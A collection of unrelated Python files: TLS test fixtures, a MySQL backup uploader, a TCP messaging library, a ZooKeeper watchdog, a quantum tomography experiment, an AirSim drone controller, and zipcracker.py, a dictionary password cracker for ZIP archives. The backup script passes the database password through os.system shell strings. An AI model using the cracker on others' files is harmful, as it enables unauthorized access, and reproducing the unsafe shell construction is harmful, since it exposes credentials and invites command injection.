if not hasattr(ssl, "PROTOCOL_TLSv1_2") or "TLSv1.2" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.2")
@pytest.fixture(scope="function")
def requires_tlsv1_3(supported_tls_versions):
"""Test requires TLSv1.3 available"""
if (
not getattr(ssl, "HAS_TLSv1_3", False)
or "TLSv1.3" not in supported_tls_versions
):
pytest.skip("Test requires TLSv1.3")
|
BakSql.py
|
#!/usr/bin/python3
import sys
import time
import os
import zipfile
import threading
import Config
from DirOrFileToOSS import DirOrFileToOSS
isDelFile = True
db_host = Config.db_host
db_user = Config.db_user
db_passwd = Config.db_passwd
db_name = Config.db_name
db_charset = Config.db_charset
mysqldump_path = Config.mysqldump_path
# 当前目录日期后缀
dirsubfix = time.strftime('%Y/%m', time.localtime())
locBakPath = Config.bakRootPath + '/sqlbak/' + dirsubfix
if mysqldump_path == '':
mysqldump_path = 'mysqldump'
isDocker = Config.isDocker
class kl_log:
def __init__(self, filename='kl_log'):
self.filename = filename + '-'
self.filepath = Config.logPath + '/'
def setpath(self, filepath):
self.filepath = filepath
def setfilename(self, filename):
self.filename = filename + '-'
def write(self, data='', model='a'):
fname = time.strftime('%Y-%m-%d', time.localtime())
fpath = '%s%s%s.log' % (self.filepath, self.filename, fname)
if not os.path.exists(os.path.dirname(fpath)):
os.makedirs(os.path.dirname(fpath))
ti = time.strftime('%Y-%m-%d %X', time.localtime())
f = open(fpath, model)
f.write("%s: %s\n" % (ti, data))
f.close()
return True
log = kl_log()
def runCmd(str):
print(str)
os.system(str)
def bakmysql(db_name, sss):
try:
global baknum
baknum = baknum + 1
db_backup_name = locBakPath + r"/%s_%s.sql" % (time.strftime("%Y-%m-%d_%H-%M-%S"), db_name)
if not os.path.exists(os.path.dirname(db_backup_name)):
os.makedirs(os.path.dirname(db_backup_name))
zip_src = db_backup_name
zip_dest = zip_src + ".zip"
database.append(zip_dest)
print("开始备份数据库:%s..." % db_name)
if isDocker:
runCmd("docker exec mysql mysqldump --skip-extended-insert --skip-comments -u%s -p%s %s --default_character-set=%s > %s" % (db_user, db_passwd, db_name, db_charset, db_backup_name))
else:
runCmd(mysqldump_path + " --skip-extended-insert --skip-comments -h%s -u%s -p%s %s --default_character-set=%s > %s" % (db_host, db_user, db_passwd, db_name, db_charset, db_backup_name))
if os.path.isfile(db_backup_name):
print("开始压缩数据库:%s..." % db_name)
f = zipfile.ZipFile(zip_dest, 'w', zipfile.ZIP_DEFLATED)
[dirname, filename] = os.path.split(zip_src)
f.write(zip_src, './' + filename)
f.close()
os.remove(zip_src)
print("数据库%s备份完成!" % db_name)
else:
print("数据库SQL文件不存在!")
baknum = baknum - 1
except:
baknum = baknum - 1
log.write('备份数据库%s时出错' % db_name, 'bakmysql')
if __name__ == "__main__":
baknum = 0
database = []
for i in db_name:
time.sleep(1)
threading.Thread(target=bakmysql, args=(i, '')).start()
time.sleep(3)
while baknum != 0:
time.sleep(1)
sys.stdout.write('%s个进程备份中...\r' % baknum)
sys.stdout.flush()
pass
# 压缩所有已经备份好的数据库
print('正在压缩所有数据库为一个文件...')
db_backup_name = locBakPath + r"/database-%s.zip" % (time.strftime("%Y-%m-%d_%H-%M-%S"))
f = zipfile.ZipFile(db_backup_name, 'w', zipfile.ZIP_DEFLATED)
for i in database:
if os.path.isfile(i):
[dirname, filename] = os.path.split(i)
f.write(i, './' + filename)
os.remove(i)
f.close()
print('正在把数据库上传至oss空间...')
config = {
'accessKeyID': Config.accessKeyID,
'accessKeySecret': Config.accessKeySecret,
'endpoint': Config.endpoint,
'bucketName': Config.bucketName,
'baklist': [
# git备份
{
# 要备份的目录(后面不带/)或文件全路径
'path': db_backup_name,
# 本地备份路径
'locBakPath': Config.bakRootPath + '/sqlbak',
# oss上传路径,结尾带 /
'ossPath': 'DataAutoBak/sqlbak/',
# 要忽略的文件或目录
'ignoreDirOrFile': ['.git', 'runtime', 'Data', 'aspnet_client', 'imagethumb'],
# 是否删除本地备份,如果上传oss为False时此设置不会生效
'isRemoveLocBak': False,
# 是否上传oss
'isUploadOss':True
},
]
}
bak = DirOrFileToOSS(config)
bak.run()
|
_fail_fork.py
|
import signal
import multiprocessing as mp
from openmp_parallel_sum import parallel_sum
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser('Test compat openMP/multproc')
parser.add_argument('--start', type=str, default='fork',
help='define start method tested with openMP')
args = parser.parse_args()
parallel_sum(10)
mp.set_start_method(args.start)
p = mp.Process(target=parallel_sum, args=(10,))
def raise_timeout(a, b):
print("TIMEOUT - parallel_sum could not complete in less than a sec")
p.terminate()
signal.signal(signal.SIGALRM, raise_timeout)
signal.alarm(1)
p.start()
p.join()
print("done")
|
ReliableCommunication.py
|
import socket
from datetime import datetime
import socket, time, threading, time, sys, json
'''
TCP Server class
'''
class Server:
MAX_CLIENTS = 5
PORT_IN_USE_TIMEOUT = 3
def __init__(self, address, port, messageDataType="json", byteOrder="little", sendMostRecent=True):
'''
Create a TCP Server object. Call start() to run it.
@param string address address to run on. eg: '192.168.1.23'
@param int port port to host on. eg: 3000
@param string messageDataType 'json' or 'string' to auto parse messages. Otherwise will be binary
@param string byteOrder 'little' or 'big' endian. Other ReliableCommunication scripts use 'little'. But if you are connecting to a different server, they may use big endian numbers for their headers.
@param bool sendMostRecent (unused) whether to drop messages queued for sending
'''
self.port = port
self.address = address
self.byteOrder = byteOrder
self.conn = None
self.clients = []
self.sock = None
self.STOP = False
self.dataToSend = None
self.sendMostRecent = sendMostRecent
self.lock = threading.Lock()
self.messageDataType = messageDataType
self.__onmessage_callbacks__ = []
self.__onconnect_callbacks__ = []
self.__onclose_callbacks__ = []
self.thread = threading.Thread(target=self.__accept_clients_loop__, name="Server {} newclient_accept".format(self.port))
print("[Server "+str(self.port)+"] Initialized.")
def start(self):
'''
Starts the server - begins accepting clients
will create threads for each client that connects.
Allows for Server.MAX_CLIENTS number of clients to connect
'''
self.thread.start()
def __accept_clients_loop__(self):
''' Constantly listen and accept clients '''
print("[Server {}] Open for new connections".format(self.port))
# Constantly look for a connection
while not self.STOP:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.bind((self.address, self.port))
except:
print("[Server "+str(self.port)+"] Port already in use")
self.sock.close()
self.sock = None
time.sleep(Server.PORT_IN_USE_TIMEOUT)
continue
self.sock.listen(Server.MAX_CLIENTS)
while not self.STOP:
# Accept incoming connections
self.sock.settimeout(3)
try:
conn, client = self.sock.accept()
# Create Client object
clientObject = Client(client[0], client[1], True, conn, self.messageDataType, self.byteOrder, self.sendMostRecent)
# subscribe to client events
clientObject.add_onmessage_callback(self.__onmessage_caller__)
clientObject.add_onclose_callback(self.__remove_client__)
clientObject.add_onclose_callback(self.__onclose_caller__)
self.clients.append(clientObject)
# Start listener loop
clientObject.listener.start()
# Call onConnect subscribers
threading.Thread(target=self.__onconnect_caller__, args=(clientObject,), name="Server {} onconnect callbacks".format(self.port)).start()
except socket.timeout:
continue
except Exception as e:
self.stop()
raise e
if (self.sock):
self.sock.close()
print("[Server {}] Socket Closed".format(self.port))
'''
CALLBACK METHODS
'''
def __onmessage_caller__(self, message):
''' Calls all of the subscribed listeners whenever a client gets a message '''
for callback in self.__onmessage_callbacks__:
callback(message)
def __onclose_caller__(self, client):
''' Calls all of the subscribed onclose listeners whenever a client disconnects '''
for callback in self.__onclose_callbacks__:
callback(client)
def __onconnect_caller__(self, client):
''' Calls all of the subscribed onconnect listeners whenever a client connects '''
for callback in self.__onconnect_callbacks__:
callback(client)
def add_onmessage_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when server receives a message from any of the clients
function will be called in the order they are added
@param func the function to add. eg: myServer.add_onmessage_callback(dosomething)
'''
self.__onmessage_callbacks__.append(func)
def add_onclose_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when any client disconnects.
functions will be called in the order they are added
@param func the function to add. eg: myServer.add_onclose_callback(dosomething)
'''
self.__onclose_callbacks__.append(func)
def add_onconnect_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when any client connects.
functions will be called in the order they are added
@param func the function to add. eg: myServer.add_onclose_callback(dosomething)
'''
self.__onconnect_callbacks__.append(func)
def remove_onmessage_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Server.__remove_func_from_list__(self.__onmessage_callbacks__, func, index)
def remove_onclose_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Server.__remove_func_from_list__(self.__onclose_callbacks__, func, index)
def remove_onconnect_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Server .__remove_func_from_list__(self.__onconnect_callbacks__, func, index)
def __remove_client__(self, client):
''' removes client from server's list of clients '''
self.clients.remove(client)
@staticmethod
def __remove_func_from_list__(listToModify, func=None, index=0):
''' logic to remove either a function or index from a list '''
if func is not None:
if func in listToModify:
listToModify.remove(func)
return True
else:
return False
if 0 < index < len(listToModify):
listToModify.pop(index)
return True
else:
return False
'''
SENDING METHODS
'''
def broadcast(self, data):
'''
Send a message to all clients connected to the server
@param data the message to send - either json, string, or binary (can be different from what the server parses)
'''
for client in self.clients:
threading.Thread(target=client.send, args=(data,), name="Client {}:{} send".format(client.address, client.port)).start()
def sendTo(self, data, server_client=0):
'''
Send a message to a particular client
@param data to message to send - either json, string, or binary
@param server_client can be client index or the client object you wish to send to
'''
if type(server_client) is type(0):
if server_client < len(self.clients):
self.clients[server_client].send(data)
return
else:
raise IndexError("Passed index {} but only {} clients exist".format(server_client, len(self.clients)))
if type(server_client) is type(Client):
server_client.send(data)
def __del__(self):
self.stop()
def stop(self):
'''
Stops the server. Disconnects clients. Ends all threads.
Use this to cleanly close everything.
'''
if not self.STOP:
self.STOP = True
for client in self.clients:
client.conn.shutdown(1)
client.close()
print("[Server {}] Stopping... ({} second timeout)".format(self.port, Server.PORT_IN_USE_TIMEOUT))
'''
TCP Client class
Instantiating and calling connect() starts a TCP client connection to the passed address and port
Also used by Server
'''
class Client:
def __init__(self, address, port, controlledByServer=False, connection=None, messageDataType="json", byteOrder="little", sendMostRecent=False, autoReconnect=False):
'''
Creates an object for threaded management of a TCP connection with a server. (can also be used by a server to manage clients)
call myClient.connect() to establish connection with server and begin receiving messages
@param string address the device address to connect to. eg: "192.168.1.55"
@param int port the server port to connect to. eg: 6000
@param bool controlledByServer wether the instance is being managed by a server. False by default
@param Socket connection if controlled by a server, this is the socket connection object to a client. None by default
@param string messageDataType 'json' or 'string' to automatically parse incoming messages as either of these. Otherwise will use binary
@param string byteOrder 'little' or 'big' endian depending on the headers being used.
@param bool sendMostRecent whether to drop accumulated packets and only send the most recent messages
@param bool autoReconnect automatically reconnect to the server if connection is lost. Forced to False if controlled by server
'''
# connection and message passing type
self.address = address
self.port = port
self.conn = connection
self.messageType = messageDataType
self.byteOrder = byteOrder
# state management
self.STOP = False
self.listener = None
# listeners
self.onMessage = []
self.onClose = []
self.onConnect = []
# options
self.autoReconnect = False
self.__can_connect__ = False
self.sendMostRecent = sendMostRecent
if self.conn is None or controlledByServer is False:
self.__can_connect__ = True
self.autoReconnect = autoReconnect
else:
self.listener = threading.Thread(target=self.__listen__, name="Client of {}:{} listener".format(self.address, self.port))
'''
CONTROL METHODS
'''
def connect(self):
'''
Starts connection with server.
'''
if self.__can_connect__:
self.STOP = False
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((self.address, self.port))
self.listener = threading.Thread(target=self.__listen__, name="Client of {}:{} listener".format(self.address, self.port))
self.listener.start()
threading.Thread(target=self.__onconnect_caller__, name="Client {}:{} onconnect callbacks".format(self.address, self.port)).start()
else:
raise Exception("Cannot establish client connection inside a server")
def __listen__(self):
''' Constantly listens for messages, automatically parses as json or string, and starts callback threads '''
while not self.STOP:
if (self.conn):
try:
# Get Message Header
self.conn.settimeout(3)
datalen = int.from_bytes(self.conn.recv(4), self.byteOrder)
data = self.conn.recv(datalen)
# Parse Data into a message based self.messageType
msg = data
if self.messageType == "json":
msg = Client.parseJson(data)
elif self.messageType == "string":
msg = msg.decode("utf-8")
# Callback
threading.Thread(target=self.__onmessage_caller__, args=(msg,), name="Client {}:{} onmessage_callbacks".format(self.address, self.port)).start()
except socket.timeout:
continue
except ConnectionResetError:
self.close()
continue
except ConnectionAbortedError:
self.close()
continue
except:
print("[Client {}:{}] Exception in read loop \n\t{}".format(self.address, self.port, sys.exc_info()))
self.close()
continue
else:
self.close()
# Close out
self.conn.close()
def send(self, message):
''' Sends a message '''
# TODO: make this into a queue
as_bytes = None
as_string = None
# Convert to bytes
if type(message) is type({}):
as_string = json.dumps(message)
if type(message) is type(""):
as_string = message
if type(message) is type(b''):
as_bytes = message
if as_string is not None:
as_bytes = as_string.encode("utf-8")
# Add Header
if (self.conn is not None and not self.STOP):
# Get Message Length
messageLength = (len(as_bytes)).to_bytes(4, byteorder=self.byteOrder, signed=False)
# SEND
try:
self.conn.send(bytes(messageLength)) # 4 bytes with the size of the image
self.conn.send(bytes(as_bytes)) # If throwing error, check if numpy array is converting to byte array. May need to call bytes(data.tobytes()) ERROR: only integer arrays with one element can be...
except TypeError:
tb = sys.exc_info()[2]
print("[Client {}:{}] Exception sending data {}\n\t{} {}".format(self.address, self.port, sys.exc_info()[1], tb.tb_frame.f_code.co_filename, tb.tb_lineno))
# except ConnectionAbortedError:
# self.close()
# except ConnectionResetError:
# self.close()
# except BrokenPipeError:
# self.close()
# except OSError:
# self.close()
except:
self.close()
def close(self):
if not self.STOP:
self.STOP = True
# Call callbacks
threading.Thread(target=self.__onclose_caller__, name="Client {}:{} close callbacks".format(self.address, self.port)).start()
# Autoreconnect
if (self.autoReconnect):
time.sleep(1)
self.connect()
'''
CALLBACK METHODS
'''
def __onmessage_caller__(self, message):
''' Calls all of the subscribed listeners whenever a client gets a message '''
for callback in self.onMessage:
callback(message)
def __onclose_caller__(self):
''' Calls all of the subscribed listeners whenever disconnected from server '''
for callback in self.onClose:
callback(self)
def __onconnect_caller__(self):
''' Calls all subscribers when (re)connected to server '''
for callback in self.onConnect:
callback(self)
def add_onmessage_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when client receives a message from the server
function will be called in the order they are added
@param func the function to add. eg: myClient.add_onmessage_callback(dosomething)
'''
self.onMessage.append(func)
def add_onclose_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when disconnected from server.
functions will be called in the order they are added
@param func the function to add. eg: myClient.add_onclose_callback(dosomething)
'''
self.onClose.append(func)
def add_onconnect_callback(self, func):
'''
Adds passed function to list of callback functions.
All functions will be called when connection with server is established or re-established.
functions will be called in the order they are added
@param func the function to add. eg: myClient.add_onclose_callback(dosomething)
'''
self.onConnect.append(func)
def remove_onmessage_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Client.__remove_func_from_list__(self.onMessage, func, index)
def remove_onclose_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Client.__remove_func_from_list__(self.onClose, func, index)
def remove_onconnect_callback(self, func=None, index=0):
'''
Removes passed function OR index from list of callbacks
@param func (optional) the function to add. If None, will use 'index'
@param index the index of the function to remove. 'func' must be None.
'''
Client.__remove_func_from_list__(self.onConnect, func, index)
'''
HELPER
'''
@staticmethod
def __remove_func_from_list__(listToModify, func=None, index=0):
''' logic to remove either a function or index from a list '''
if func is not None:
if func in listToModify:
listToModify.remove(func)
return True
else:
return False
if 0 < index < len(listToModify):
listToModify.pop(index)
return True
else:
return False
@staticmethod
def parseJson(data):
data = data.decode("utf-8")
msg = json.loads(data)
return msg
|
zipcracker.py
|
import os
import optparse
import zipfile
from pyfiglet import figlet_format
from threading import Thread
os.system("clear")
print (" MYANMAR ANONYMOUS FAMILY. ")
print (figlet_format("ZIP CRACKER"))
print ("___________________________________")
print ("Author : BhonePyae")
print ("Email : bptz393@gmail.com")
print ("___________________________________")
def extract_zip(zFile, password):
try:
password = bytes(password.encode('utf-8'))
zFile.extractall(pwd=password)
print ("[+] Password Found: " + password + '\n')
except:
pass
def Main():
parser = optparse.OptionParser("useage &prog "+\
"-f <zipfile> -d <dictionary>")
parser.add_option('-f', dest='zname', type='string',\
help='specify zip file')
parser.add_option('-d', dest='dname', type='string',\
help='specify dictionary file')
(options, arg) = parser.parse_args()
if (options.zname == None) | (options.dname == None):
print (parser.usage)
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
passFile = open(dname)
for line in passFile.readlines():
password = line.strip('\n')
t = Thread(target=extract_zip, args=(zFile, password))
t.start()
if __name__ == '__main__':
Main()
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import sys
import logging
import time
import signal
from multiprocessing import Process
main_dir = "/root/V3/project/"
signal_dir = '/signal/huanqiunews'
task_type = "huanqiunews"
def run_proc():
os.chdir(main_dir +"huanqiunews/huanqiunews/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
except Exception,e:
print "no child"
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
except Exception: #判断
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
compare_Walternating_sgd_1layers.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.nqubit, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.onequbit)
importlib.reload(qtm.nqubit)
importlib.reload(qtm.fubini_study)
def run_walternating(num_layers, num_qubits):
thetas = np.ones(int(num_layers*num_qubits / 2) + 3 * num_layers * num_qubits)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_alternating: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.nqubit.create_Walternating_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.nqubit.create_Walternating_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
# Get |psi~> = U_target|000...>
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.nqubit.create_Walternating_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writting ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_walternating_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [1]
num_qubits = [2, 3, 4, 5, 6]
t_walternatings = []
for i in num_layers:
for j in num_qubits:
t_walternatings.append(multiprocessing.Process(target = run_walternating, args=(i, j)))
for t_walternating in t_walternatings:
t_walternating.start()
for t_walternating in t_walternatings:
t_walternating.join()
print("Done!")
|
auto_mode_turn_yaw_V1.py
|
import airsim
import numpy as np
import math
from math import cos,sin,radians,degrees
import os
import pprint
import cv2, time, timeit, threading, sys
import random
import my_fuzzyController
def adjYaw():
global tag_time
while True:
tag_time += 1
time.sleep(1)
"""--------------------------- GET DRONE INFO ----------------------------------"""
def get_position():
PosNow = client.getMultirotorState().kinematics_estimated.position
return list((round(PosNow.x_val,3), round(PosNow.y_val,3), round(PosNow.z_val,3)))
def get_velocity():
v = client.getMultirotorState().kinematics_estimated.linear_velocity
return list((round(v.x_val,2),round(v.y_val,2),round(v.z_val,2)))
def get_attitude():
pitch, roll, yaw = airsim.to_eularian_angles(client.simGetVehiclePose().orientation)
return list((degrees(pitch),degrees(roll),degrees(yaw)))
"""----------------------------- CONTROL STEP ----------------------------"""
def forward():
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=speed, v_right=0)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2]))#.join()
time.sleep(delay)
def backword():
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=-speed, v_right=0)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
time.sleep(delay)
def left(v):
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=0, v_right=-v)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
time.sleep(delay)
def right(v):
attitude = get_attitude()
V = frd2ned_in_velocity(theta=-attitude[2], v_front=0, v_right=v)
client.moveByVelocityZAsync(V[0],V[1],alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
time.sleep(delay)
def stop():
attitude = get_attitude()
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
def turn_left():
attitude = get_attitude()
attitude[2] -= 3 + random.randint(0, 5)
print('cur_yaw: ',attitude[2])
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False,attitude[2]))#.join()
def turn_right():
attitude = get_attitude()
attitude[2] += 3 + random.randint(0, 5)
print('cur_yaw: ',attitude[2])
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2]))#.join()
def turn_up():
global alt
attitude = get_attitude()
alt = alt - 0.5
print('turn_up')
client.moveByVelocityZAsync(0,0,alt,duration, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, attitude[2])).join()
def Turn_Yaw(heading):
#print('turn_yaw')
client.moveByVelocityZAsync(0,0,alt,3, airsim.DrivetrainType.MaxDegreeOfFreedom, airsim.YawMode(False, heading)).join()
"""----------------------------------- OTHER FUNCTION -------------------------------------------"""
def frd2ned_in_velocity(theta,v_front,v_right):
v_frd = np.array([v_front,v_right]).reshape(2,1)
rotation_matrix = np.array([cos(radians(theta)),-sin(radians(theta)),sin(radians(theta)),cos(radians(theta))]).reshape(2,2)
v_ned = np.dot(rotation_matrix,v_frd).reshape(-1,)
#print('------------------------------------------')
#print('v_ned: ',v_ned)
return v_ned
# Set yaw
def yawDegree(now, goal):
# Local frame
delta_x = (goal[0] - now[0])
delta_y = (goal[1] - now[1])
theta = np.rad2deg(np.arctan2(delta_y,delta_x))
return round(theta,1)
def SetWaypoint(All_points_name):
wp = []
for Obj_Name in All_points_name:
Waypoint = client.simGetObjectPose(Obj_Name).position
# Check
if not (math.isnan(Waypoint.x_val) and math.isnan(Waypoint.y_val)):
print(">> {wp_name:} Check: OK!".format(wp_name=Obj_Name))
else:
print(">> {wp_name:} Nan detected, re-access.".format(wp_name=Obj_Name))
while (math.isnan(Waypoint.x_val) or math.isnan(Waypoint.y_val)):
Waypoint = client.simGetObjectPose(Obj_Name).position
wp.append([Waypoint.x_val, Waypoint.y_val, alt])
return wp
def set_waypoints_from_txt(path):
try:
wp = []
f = open(path,'r')
while 1:
line = f.readline()
if line is not '':
text = line.split(' ')
wp.append( [ float(text[0]), float(text[1]), float(text[2]) ] )
print(text)
else:
break
f.close()
return wp
except Exception as e:
print(e)
sys.exit()
#---------------- GLOBAL VARIABLES --------------
alt = -4
cur_yaw = 0 # heading :+x axis
duration = 0.01
speed = 3
delay = 0.1
tag_time = 0
th2 = threading.Thread(target=adjYaw)
th2.setDaemon(True)
# the index of waypoints list
wp_i = 0
h, w = 480, 640
eq_w = int(w/6)
center_L = [ int(w/8) * 2, int(h/2) ] # [column, row]
center_M = [ int(w/8) * 4, int(h/2) ]
center_R = [ int(w/8) * 6, int(h/2) ]
shift = 80#120 # (up + down) = (shift/2, shift/2)
# obstacle position in middle, right, left ROI
L_i, L_j = None, None
R_i, R_j = None, None
M_i, M_j = None, None
# Fuzzy system
fz = my_fuzzyController.FuzzyControl()
fz.pre_fzprocess()
#----------------- QUADROTOR CLIENT --------------
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
client.armDisarm(True)
print(client.getMultirotorState().kinematics_estimated.orientation)
""" ================== Read the waypoints from waypoints.txt =================="""
# Set waypoint
#wp = set_waypoints_from_txt('waypoints/waypoints.txt')
""" ================== Read the waypoints from airsim object Wp_* =================="""
Waypoints_name = client.simListSceneObjects("Wp_.*")
print(">> Waypoint list: {ww:}".format(ww=Waypoints_name))
wp = SetWaypoint(Waypoints_name)
# Set home
home = client.getMultirotorState().kinematics_estimated.position
print('>> Home_(x, y, alt) -> ({xx}, {yy}, {zz})'.format(xx=home.x_val, yy=home.y_val, zz=home.z_val))
# Add home into wp-list for RTL.
print (">> Add Home into wp-list for RTL ...")
wp.append([home.x_val, home.y_val, alt])
print(">> {n:} Waypoints: [x, y, alt]".format(n=len(wp)))
for i in range(len(wp)):
print('\t[{i:}]: {wp}'.format(i=i, wp=wp[i]))
print('take off')
client.takeoffAsync()
print('take off to alt=',alt)
client.moveToZAsync(alt, velocity=1).join()
att = get_attitude()
print('pitch: {} deg, roll: {} deg, yaw: {} deg'.format(att[0],att[1],att[2]))
GPS = get_position()
Heading = yawDegree(GPS, wp[wp_i])
Turn_Yaw(Heading)
th2.start()
try:
while wp_i < len(wp):
#t = timeit.default_timer()
responses = client.simGetImages([airsim.ImageRequest("0", airsim.ImageType.DepthPlanner, pixels_as_float=True, compress=False),
airsim.ImageRequest("1", airsim.ImageType.Scene, False, False)])
if not responses:
client.moveByVelocityAsync(vx=0, vy=0, vz=0, duration=1).join()
print("** Wait for data. **")
continue
try:
# For depth
response = responses[0]
img1d = np.array(response.image_data_float, dtype=np.float)
temp = img1d
temp2 = np.reshape(temp, (responses[0].height, responses[0].width))
# Depth data transformating
img1d = img1d * 4 + 20
img1d[img1d>255] = 255
img2d = np.reshape(img1d, (responses[0].height, responses[0].width))
depth = np.array(img2d,dtype=np.uint8)
color = responses[1]
imgcolor = np.fromstring(color.image_data_uint8, dtype=np.uint8)
imgcolor = imgcolor.reshape(responses[1].height, responses[1].width, -1)
if imgcolor.shape[2] == 4:
imgcolor = cv2.cvtColor(imgcolor,cv2.COLOR_RGBA2BGR)
depth = cv2.cvtColor(depth,cv2.COLOR_GRAY2BGR)
depth = cv2.addWeighted(imgcolor, 0.75, depth, 0.25, 0)
except Exception as e:
#print(e)
pass
GPS = get_position()
V_global = get_velocity()
Heading = yawDegree(GPS, wp[wp_i])
"""======================== AVOID DECITION ================================="""
ROI_M = temp2[(center_M[1]-shift):(center_M[1]+shift),(center_M[0]-eq_w):(center_M[0]+eq_w)] *100 # [cm]
dx_M, dy_M = np.where(ROI_M < 1000) # cm
if dx_M.any():
M_i = int(np.median(dx_M))
M_j = int(np.median(dy_M))
x = ((center_M[0]-eq_w) + (center_M[0] + eq_w))//2 - ((center_M[0]-eq_w) + M_i)
y = ((center_M[1]-shift) + (center_M[1] +shift))//2 - ((center_M[1]-shift) + M_j)
z = ROI_M[M_i,M_j]
print('------------------------------------------------------------------------------------')
print(">> Recieve data: x= {}, y= {}, Dist= {:.2f} cm".format(x, y, z))
vx, vy, vz, turn_yaw, cost_t = fz.fzprocess(delta_x = x, delta_y = y, distance = z)
